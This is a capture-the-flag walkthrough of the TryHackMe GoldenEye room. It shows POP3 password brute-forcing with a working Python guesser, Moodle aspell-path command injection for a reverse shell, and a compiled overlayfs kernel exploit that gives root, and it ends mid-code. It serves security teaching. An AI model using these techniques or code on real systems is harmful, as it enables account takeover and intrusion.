Tryhackme - GoldenEye

  1. Reconnaissance
  2. Enumeration
  3. RCE
  4. Privilege escalation

intro

Hello, it's me again. Today I'm going to solve the TryHackMe CTF room GoldenEye.

Reconnaissance

The first step is to scan for open ports on the target host.

PORT      STATE SERVICE  REASON  VERSION
25/tcp    open  smtp     syn-ack Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:22:34
| Not valid after:  2028-04-21T03:22:34
| MD5:   cd4ad178f21617fb21a60a168f46c8c6
| SHA-1: fda3fc7b6601474696aa0f56b1261c2936e8442c
| -----BEGIN CERTIFICATE-----
| MIICsjCCAZqgAwIBAgIJAPokpqPNVgk6MA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
| BAMTBnVidW50dTAeFw0xODA0MjQwMzIyMzRaFw0yODA0MjEwMzIyMzRaMBExDzAN
| BgNVBAMTBnVidW50dTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMM6
| ryxPHxf2wYf7DNTXnW6Hc6wK+O6/3JVeWME041jJdsY2UpxRB6cTmBIv7dAOHZzL
| eSVCfH1P3IS0dvSrqkA+zpPRK3to3SuirknpbPdmsNqMG1SiKLDl01o5LBDgIpcY
| V9JNNjGaxYBlyMjvPDDvgihmJwpb81lArUqDrGJIsIH8J6tqOdLt4DGBXU62sj//
| +IUE4w6c67uMAYQD26ZZH9Op+qJ3OznCTXwmJslIHQLJx+fXG53+BLiV06EGrsOk
| ovnPmixShoaySAsoGm56IIHQUWrCQ03VYHfhCoUviEw02q8oP49PHR1twt+mdj6x
| qZOBlgwHMcWgb1Em40UCAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
| AAOCAQEAfigEwPIFEL21yc3LIzPvHUIvBM5/fWEEv0t+8t5ATPfI6c2Be6xePPm6
| W3bDLDQ30UDFmZpTLgLkfAQRlu4N40rLutTHiAN6RFSdAA8FEj72cwcX99S0kGQJ
| vFCSipVd0fv0wyKLVwbXqb1+JfmepeZVxWFWjiDg+JIBT3VmozKQtrLLL/IrWxGd
| PI2swX8KxikRYskNWW1isMo2ZXXJpdQJKfikSX334D9oUnSiHcLryapCJFfQa81+
| T8rlFo0zan33r9BmA5uOUZ7VlYF4Kn5/soSE9l+JbDrDFOIOOLLILoQUVZcO6rul
| mJjFdmZE4k3QPKz1ksaCAQkQbf3OZw==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http     syn-ack Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
55006/tcp open  ssl/pop3 syn-ack Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server/organizationalUnitName=localhost/emailAddress=root@localhost
| Issuer: commonName=localhost/organizationName=Dovecot mail server/organizationalUnitName=localhost/emailAddress=root@localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d0392e71c76a2cb3e694ec407228ec63
| SHA-1: 9d6a92eb5f9fe9ba6cbddc9355fa5754219b0b77
| -----BEGIN CERTIFICATE-----
| MIIDnTCCAoWgAwIBAgIJAOZHv9ZnCiJ+MA0GCSqGSIb3DQEBCwUAMGUxHDAaBgNV
| BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAG
| A1UEAwwJbG9jYWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDAe
| Fw0xODA0MjQwMzIzNTJaFw0yODA0MjMwMzIzNTJaMGUxHDAaBgNVBAoME0RvdmVj
| b3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAGA1UEAwwJbG9j
| YWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBAMo64gzxBeOvt+rgUQncWU2OJESGR5YJ9Mcd
| h0nF6m0o+zXwvkSx+SW5I3I/mpJugQfsc2lW4txo3xoAbvVgc2kpkkna8ojodTS3
| iUyKXwN3y2KG/jyBcrH+rZcs5FIpt5tDB/F1Uj0cdAUZ+J/v2NEw1w+KjlX2D0Zr
| xpgnJszmEMJ3DxNBc8+JiROMT7V8iYu9/Cd8ulAdS8lSPFE+M9/gZBsRbzRWD3D/
| OtDaPzBTlb6es4NfrfPBanD7zc8hwNL5AypUG/dUhn3k3rjUNplIlVD1lSesI+wM
| 9bIIVo3IFQEqiNnTdFVz4+EOr8hI7SBzsXTOrxtH23NQ6MrGbLUCAwEAAaNQME4w
| HQYDVR0OBBYEFFGO3VTitI69jNHsQzOz/7wwmdfaMB8GA1UdIwQYMBaAFFGO3VTi
| tI69jNHsQzOz/7wwmdfaMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB
| AMm4cTA4oSLGXG+wwiJWD/2UjXta7XAAzXofrDfkRmjyPhMTsuwzfUbU+hHsVjCi
| CsjV6LkVxedX4+EQZ+wSa6lXdn/0xlNOk5VpMjYkvff0ODTGTmRrKgZV3L7K/p45
| FI1/vD6ziNUlaTzKFPkmW59oGkdXfdJ06Y7uo7WQALn2FI2ZKecDSK0LonWnA61a
| +gXFctOYRnyMtwiaU2+U49O8/vSDzcyF0wD5ltydCAqCdMTeeo+9DNa2u2IOZ4so
| yPyR+bfnTC45hue/yiyOfzDkBeCGBqXFYcox+EUm0CPESYYNk1siFjjDVUNjPGmm
| e1/vPH7tRtldZFSfflyHUsA=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA SASL(PLAIN) RESP-CODES UIDL TOP USER AUTH-RESP-CODE PIPELINING
55007/tcp open  pop3     syn-ack Dovecot pop3d
|_pop3-capabilities: CAPA RESP-CODES SASL(PLAIN) AUTH-RESP-CODE UIDL TOP STLS USER PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server/organizationalUnitName=localhost/emailAddress=root@localhost
| Issuer: commonName=localhost/organizationName=Dovecot mail server/organizationalUnitName=localhost/emailAddress=root@localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d0392e71c76a2cb3e694ec407228ec63
| SHA-1: 9d6a92eb5f9fe9ba6cbddc9355fa5754219b0b77
| -----BEGIN CERTIFICATE-----
| MIIDnTCCAoWgAwIBAgIJAOZHv9ZnCiJ+MA0GCSqGSIb3DQEBCwUAMGUxHDAaBgNV
| BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAG
| A1UEAwwJbG9jYWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDAe
| Fw0xODA0MjQwMzIzNTJaFw0yODA0MjMwMzIzNTJaMGUxHDAaBgNVBAoME0RvdmVj
| b3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAGA1UEAwwJbG9j
| YWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBAMo64gzxBeOvt+rgUQncWU2OJESGR5YJ9Mcd
| h0nF6m0o+zXwvkSx+SW5I3I/mpJugQfsc2lW4txo3xoAbvVgc2kpkkna8ojodTS3
| iUyKXwN3y2KG/jyBcrH+rZcs5FIpt5tDB/F1Uj0cdAUZ+J/v2NEw1w+KjlX2D0Zr
| xpgnJszmEMJ3DxNBc8+JiROMT7V8iYu9/Cd8ulAdS8lSPFE+M9/gZBsRbzRWD3D/
| OtDaPzBTlb6es4NfrfPBanD7zc8hwNL5AypUG/dUhn3k3rjUNplIlVD1lSesI+wM
| 9bIIVo3IFQEqiNnTdFVz4+EOr8hI7SBzsXTOrxtH23NQ6MrGbLUCAwEAAaNQME4w
| HQYDVR0OBBYEFFGO3VTitI69jNHsQzOz/7wwmdfaMB8GA1UdIwQYMBaAFFGO3VTi
| tI69jNHsQzOz/7wwmdfaMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB
| AMm4cTA4oSLGXG+wwiJWD/2UjXta7XAAzXofrDfkRmjyPhMTsuwzfUbU+hHsVjCi
| CsjV6LkVxedX4+EQZ+wSa6lXdn/0xlNOk5VpMjYkvff0ODTGTmRrKgZV3L7K/p45
| FI1/vD6ziNUlaTzKFPkmW59oGkdXfdJ06Y7uo7WQALn2FI2ZKecDSK0LonWnA61a
| +gXFctOYRnyMtwiaU2+U49O8/vSDzcyF0wD5ltydCAqCdMTeeo+9DNa2u2IOZ4so
| yPyR+bfnTC45hue/yiyOfzDkBeCGBqXFYcox+EUm0CPESYYNk1siFjjDVUNjPGmm
| e1/vPH7tRtldZFSfflyHUsA=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time

Four ports are open. Postfix on 25 advertises VRFY, so the SMTP server will confirm whether a local user exists. Apache 2.4.7 on 80 is the main attack surface. Dovecot serves POP3 twice on non-default ports: 55006 is POP3 wrapped in TLS and 55007 is plaintext POP3 offering STLS; both advertise SASL PLAIN, so a guessed password can simply be sent as a USER/PASS pair.

Enumeration

Since port 80 is open, I'll start with the web application.

web

Looking through the page source, I find a JavaScript file:

<html>
<head>
<title>GoldenEye Primary Admin Server</title>
<link rel="stylesheet" href="index.css">
</head>

	<span id="GoldenEyeText" class="typeing"></span><span class='blinker'>&#32;</span>

<script src="terminal.js"></script>
	
</html>

Opening this JS file, I find a few interesting things:

var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;

 
  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}

The person who has to change his password is Boris.

The comment is a string of HTML numeric character references (&#73; is I, &#110; is n, and so on). Decoding it with an HTML entity decoder gives his password: InvincibleHack3r.
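As an added example that is not part of the original writeup, the Python below does the same decoding programmatically, which helps when a script hides several such runs: it decodes decimal and hexadecimal numeric character references by hand, pulls out only long unbroken runs of them (a lone &#32; in markup is noise; terminal.js uses one for the blinking cursor), and cross-checks itself against html.unescape. The comment text is a constructed copy of the terminal.js block above.

```python
import html
import re

# Constructed copy of the comment block from terminal.js as shown on the page;
# the decoder itself does not depend on this particular input.
TERMINAL_JS_COMMENT = (
    "//I encoded you p@ssword below...\n"
    "//\n"
    "//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;"
    "&#72;&#97;&#99;&#107;&#51;&#114;\n"
    "//\n"
    "//BTW Natalya says she can break your codes\n"
)

# One numeric character reference: decimal (&#73;) or hexadecimal (&#x49;).
NUMERIC_REF = re.compile(r"&#(x[0-9a-f]+|[0-9]+);", re.IGNORECASE)


def decode_numeric_refs(text: str) -> str:
    """Replace every HTML numeric character reference in text with its character."""
    def to_char(match: re.Match) -> str:
        body = match.group(1)
        code = int(body[1:], 16) if body[0] in "xX" else int(body, 10)
        return chr(code)
    return NUMERIC_REF.sub(to_char, text)


def find_encoded_strings(source: str, min_refs: int = 4) -> list:
    """Return the decoded form of every run of at least min_refs consecutive references.

    Short runs are skipped because ordinary markup uses the odd &#160; or &#32;;
    a long unbroken run inside a script or comment is the pattern worth extracting.
    """
    run = re.compile(r"(?:&#(?:x[0-9a-f]+|[0-9]+);){%d,}" % min_refs, re.IGNORECASE)
    return [decode_numeric_refs(m.group(0)) for m in run.finditer(source)]


def matches_stdlib(text: str) -> bool:
    """Cross-check the hand-written decoder against html.unescape on the same input."""
    return decode_numeric_refs(text) == html.unescape(text)


if __name__ == "__main__":
    for secret in find_encoded_strings(TERMINAL_JS_COMMENT):
        print(secret)
```

Running it prints InvincibleHack3r; the hand decoder exists only to show that the "encoding" is nothing more than code points, so there is no secret to break, exactly as the comment about Natalya suggests.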

Go to /sev-home/ and log in with the username and password just found.

sev-home

Let's check this page's source for anything special:

</video>
<div id="golden">
<h1>GoldenEye</h1>
<p>GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) </p>
<p>Please email a qualified GNO supervisor to receive the online <b>GoldenEye Operators Training</b> to become an Administrator of the GoldenEye system</p>
<p>Remember, since <b><i>security by obscurity</i></b> is very effective, we have configured our pop3 service to run on a very high non-default port</p>
</div>

...

Qualified GoldenEye Network Operator Supervisors: 
Natalya
Boris

Note the hint about POP3: the "very high non-default port" is the Dovecot service nmap found on 55006/55007. I'll try going in through the mail system, starting with Boris's web password on the plaintext POP3 port:

┌──(kalikali)-[~]
└─$ telnet 10.10.52.162 55007
Trying 10.10.52.162...
Connected to 10.10.52.162.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user boris
+OK
pass InvincibleHack3r
-ERR [AUTH] Authentication failed.

Not much use: the web password is not Boris's mailbox password. But I have a second name, natalya, and to get her password I fall back on the simplest approach, a dictionary attack against POP3 on port 55007 (the line below is hydra's result format):

[55007][pop3] host: 10.10.52.162 login: natalya password: bird

I also retry boris, since the password from the page is evidently not the one for POP3:

[55007][pop3] host: 10.10.52.162 login: boris password: secret1!
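Added example, not code from the original post: a minimal POP3 login checker in Python with a fake Dovecot-style server embedded so it runs offline. The server, its account table and the wordlist are constructed for the demonstration; against the real target you would point guess_password at port 55007. It reproduces the USER/PASS exchange from the telnet session above and shows why a dictionary attack is cheap here: the server answers +OK to any USER and reports each PASS result immediately, in plaintext.

```python
import poplib
import socketserver
import threading
from typing import Iterable, Optional

# Constructed credential store standing in for the target's Dovecot. The real
# box only gave up these pairs after the dictionary attack described above.
FAKE_ACCOUNTS = {"natalya": "bird", "boris": "secret1!", "doak": "goat"}


class FakePop3Handler(socketserver.StreamRequestHandler):
    """Just enough of POP3's AUTHORIZATION state (USER/PASS/QUIT) to exercise a client."""

    def handle(self) -> None:
        self.wfile.write(b"+OK GoldenEye POP3 Electronic-Mail System\r\n")
        user = None
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd, _, arg = line.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self.wfile.write(b"+OK\r\n")  # like Dovecot: no hint whether the user exists
            elif cmd == "PASS":
                if user is not None and FAKE_ACCOUNTS.get(user) == arg:
                    self.wfile.write(b"+OK Logged in.\r\n")
                else:
                    self.wfile.write(b"-ERR [AUTH] Authentication failed.\r\n")
            elif cmd == "QUIT":
                self.wfile.write(b"+OK Logging out.\r\n")
                return
            else:
                self.wfile.write(b"-ERR Unknown command.\r\n")


def start_fake_pop3(host: str = "127.0.0.1"):
    """Start the fake server on a free loopback port; returns (server, port)."""
    server = socketserver.ThreadingTCPServer((host, 0), FakePop3Handler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def pop3_login(host: str, port: int, user: str, password: str, timeout: float = 5.0) -> bool:
    """One USER/PASS attempt over plaintext POP3: True on '+OK', False on '-ERR'."""
    conn = poplib.POP3(host, port, timeout=timeout)
    try:
        conn.user(user)
        conn.pass_(password)
        return True
    except poplib.error_proto:
        return False
    finally:
        try:
            conn.quit()
        except (poplib.error_proto, OSError):
            pass


def guess_password(host: str, port: int, user: str, wordlist: Iterable[str]) -> Optional[str]:
    """Sequential dictionary attack; returns the first accepted password or None."""
    for candidate in wordlist:
        if pop3_login(host, port, user, candidate):
            return candidate
    return None


if __name__ == "__main__":
    server, port = start_fake_pop3()
    wordlist = ["password", "123456", "bird", "secret1!", "goat"]  # constructed
    for name in ("natalya", "boris", "doak"):
        found = guess_password("127.0.0.1", port, name, wordlist)
        print(f"[{port}][pop3] login: {name} password: {found}")
    server.shutdown()
```

Each guess is a fresh TCP connection and a line in the mail log, so on a real engagement this is loud; hydra parallelises the same dialogue, it does not change it. The one thing the fake server does not model is Dovecot's auth-failure delay, which is what bounds the guess rate in practice.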

Log in to POP3 again, this time as natalya:

┌──(kalikali)-[~]
└─$ telnet 10.10.52.162 55007                                                                                  
Trying 10.10.52.162...
Connected to 10.10.52.162.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048

Message 1:

retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.

Message 2:

retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

As message 2 says, I have to map severnaya-station.com to the target's IP in /etc/hosts, then open severnaya-station.com/gnocertdir and log in with the credentials above.

moodle

After adding the entry to /etc/hosts and opening the URL, I land on a site running the Moodle LMS.

Logging in with the user and password above, I find one unread message in this account:

doak

It introduces another user named Doak. I'll brute-force this account's POP3 password as well:

[55007][pop3] host: 10.10.52.162 login: doak password: goat

┌──(kalikali)-[~]
└─$ telnet 10.10.52.162 55007
Trying 10.10.52.162...
Connected to 10.10.52.162.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

Log in to Moodle with this user. Browsing around, I find a file named s3cret.txt under My private files. Download it:

*007,

*I was able to capture this apps adm1n cr3ds through clear txt.

*Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

*Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

Download the image from that path and analyse its metadata:

┌──(kalikali)-[~]
└─$ exiftool for-007.jpg 
ExifTool Version Number         : 12.51
File Name                       : for-007.jpg
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2018:04:24 20:40:02-04:00
File Access Date/Time           : 2022:12:27 23:35:57-05:00
File Inode Change Date/Time     : 2022:12:27 23:35:47-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : eFdpbnRlcjE5OTV4IQ==
Make                            : GoldenEye
Resolution Unit                 : inches
Software                        : linux
Artist                          : For James
Y Cb Cr Positioning             : Centered
Exif Version                    : 0231
Components Configuration        : Y, Cb, Cr, -
User Comment                    : For 007
Flashpix Version                : 0100
Image Width                     : 313
Image Height                    : 212
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 313x212
Megapixels                      : 0.066

┌──(kalikali)-[~]
└─$ echo eFdpbnRlcjE5OTV4IQ== | base64 -d                       
xWinter1995x!   

The Image Description EXIF tag holds a base64 string that decodes to xWinter1995x!. Log in to Moodle as admin with that as the password.

RCE

Next, I need a way to turn admin access into remote code execution.

Following the hint in the task, I open the Aspell settings in Moodle's administration pages, change Spell engine to PSpellShell and replace Path to aspell with a reverse-shell command that calls back to my IP and port. PSpellShell hands the configured path to a shell whenever a spell check runs, so whatever is in that field gets executed by the web server as www-data.

aspell

To trigger it, I have to run a spell check so that the server invokes the "aspell" path I just replaced.

Before running the spell check, start a listener on the port configured in the shell command:

Navigation -> Home -> My Profile -> Blogs -> Add a new entry

spellcheck

Click the ABC spell-check icon (the one with the green tick) in the editor toolbar and go back to the listener:

┌──(kalikali)-[~/CVE-2020-14321]
└─$ nc -lnvp 9001                                     
listening on [any] 9001 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.165.144] 44411
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ 
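What actually happens when the spell check fires, as an added Python example that is my own and not Moodle's code: Moodle's PSpellShell builds a single shell command string around the configured aspell path and runs it, and run_spellcheck_vulnerable reproduces that shape. The injected "path" is a harmless echo standing in for the reverse shell. The hardened variant beside it is my suggestion, with an assumed allow-list of binaries: validate the path and the language tag, pass an argv list with no shell, and feed the text on stdin instead of through a redirect.

```python
import os
import re
import subprocess
import tempfile

# Hypothetical allow-list for the hardened variant; the page does not show
# Moodle's own defaults, so these paths are an assumption.
ALLOWED_ASPELL_BINARIES = ("/usr/bin/aspell", "/usr/local/bin/aspell")
LANG_TAG = re.compile(r"[A-Za-z]{2,3}(?:_[A-Za-z]{2})?")


def build_shell_command(aspell_path: str, lang: str, tmpfile: str) -> str:
    """Vulnerable shape: the admin-configured path is pasted into one shell string."""
    return f"{aspell_path} -a --lang={lang} --encoding=utf-8 -H < {tmpfile}"


def run_spellcheck_vulnerable(aspell_path: str, lang: str, text: str) -> str:
    """Runs that string through /bin/sh: this is what lets 'Path to aspell' become a shell."""
    fd, tmp = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(text)
    try:
        result = subprocess.run(build_shell_command(aspell_path, lang, tmp),
                                shell=True, capture_output=True, text=True, timeout=15)
        return result.stdout
    finally:
        os.unlink(tmp)


def is_safe_aspell_config(aspell_path: str, lang: str) -> bool:
    """Accept only an allow-listed binary and a plain language tag (en, en_US, ...)."""
    return aspell_path in ALLOWED_ASPELL_BINARIES and LANG_TAG.fullmatch(lang) is not None


def run_spellcheck_hardened(aspell_path: str, lang: str, text: str) -> str:
    """Hardened shape: validated inputs, argv list, no shell, text on stdin."""
    if not is_safe_aspell_config(aspell_path, lang):
        raise ValueError("refusing to run: aspell path or language not allow-listed")
    argv = [aspell_path, "-a", f"--lang={lang}", "--encoding=utf-8", "-H"]
    result = subprocess.run(argv, input=text, capture_output=True, text=True, timeout=15)
    return result.stdout


if __name__ == "__main__":
    # Constructed stand-in for the reverse shell: a harmless command that proves
    # the configured "path" is being interpreted by a shell.
    injected_path = "echo injected-by-config; #"
    print(run_spellcheck_vulnerable(injected_path, "en", "helo wrld"))
    try:
        run_spellcheck_hardened(injected_path, "en", "helo wrld")
    except ValueError as err:
        print(err)
```

The trailing "; #" in the injected value comments out the real aspell arguments so the shell never complains about them, which is also why a reverse-shell one-liner in that field works without further tricks. Note that the hardened version would still be an admin-only setting; the defence is that an admin password alone no longer equals code execution on the web server.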

Privilege escalation

Next, again following the task description, I download exploit 37292 (the Exploit-DB "overlayfs" local privilege escalation, CVE-2015-1328, for Ubuntu kernels 3.13.0 up to 3.19; the target's 3.13.0-32-generic is inside that range), upload it to the target and try to compile it there with gcc.

$ gcc 37292.c -o exploit
gcc 37292.c -o exploit
/bin/sh: 11: gcc: not found

There is no gcc on this box, so I try cc. Here it resolves to clang (the warning wording and the "5 warnings generated." summary are clang's). The warnings are a missing return value and missing prototypes (unshare and clone come from <sched.h> with _GNU_SOURCE, waitpid and wait from <sys/wait.h>); the binary still builds:

$ cc 37292.c -o exploit
cc 37292.c -o exploit
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
        if(unshare(CLONE_NEWUSER) != 0)
           ^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                ^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
            waitpid(pid, &status, 0);
            ^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
    wait(NULL);
    ^
5 warnings generated.
$ ./exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# ls -la /root
ls -la /root
total 44
drwx------  3 root root 4096 Apr 29  2018 .
drwxr-xr-x 22 root root 4096 Apr 24  2018 ..
-rw-r--r--  1 root root   19 May  3  2018 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
drwx------  2 root root 4096 Apr 28  2018 .cache
-rw-------  1 root root  144 Apr 29  2018 .flag.txt
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-------  1 root root 1024 Apr 23  2018 .rnd
-rw-------  1 root root 8296 Apr 29  2018 .viminfo
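Before uploading a kernel exploit it is worth confirming its preconditions on the target, so here is an added Python pre-flight check (my own, not part of the room or of the exploit). 37292 targets 3.13.0 <= kernel < 3.19 and, as the compiler warnings above show, it relies on unshare(CLONE_NEWUSER), that is, unprivileged user namespaces. The check parses the uname -r string, forks a throwaway child that attempts that call, and reads the Debian/Ubuntu sysctl where it exists.

```python
import ctypes
import os
import re
from typing import Tuple

CLONE_NEWUSER = 0x10000000  # from <sched.h>; the flag 37292 passes to unshare()

# Range taken from the exploit's Exploit-DB title: "Linux Kernel 3.13.0 < 3.19".
EDB_37292_MIN = (3, 13, 0)
EDB_37292_MAX_EXCLUSIVE = (3, 19, 0)


def parse_kernel_release(release: str) -> Tuple[int, int, int]:
    """'3.13.0-32-generic' -> (3, 13, 0); the distribution ABI suffix is ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(x) for x in m.groups())


def in_37292_range(release: str) -> bool:
    return EDB_37292_MIN <= parse_kernel_release(release) < EDB_37292_MAX_EXCLUSIVE


def unprivileged_userns_allowed() -> bool:
    """Try unshare(CLONE_NEWUSER) in a child; True if the kernel permits it.

    Forking keeps the calling process out of the new namespace. Returns False
    on platforms without fork() or unshare() (anything that is not Linux).
    """
    if not hasattr(os, "fork"):
        return False
    try:
        unshare = ctypes.CDLL(None, use_errno=True).unshare
    except (OSError, AttributeError):
        return False
    pid = os.fork()
    if pid == 0:  # child: report the syscall result through the exit status
        os._exit(0 if unshare(CLONE_NEWUSER) == 0 else 1)
    _, status = os.waitpid(pid, 0)
    return os.WIFEXITED(status) and os.WEXITSTATUS(status) == 0


def read_sysctl(path: str):
    """Return the file's content or None; the Debian/Ubuntu knob does not exist everywhere."""
    try:
        with open(path) as fh:
            return fh.read().strip()
    except OSError:
        return None


def preflight(release: str) -> dict:
    return {
        "kernel_in_range": in_37292_range(release),
        "userns_unshare_ok": unprivileged_userns_allowed(),
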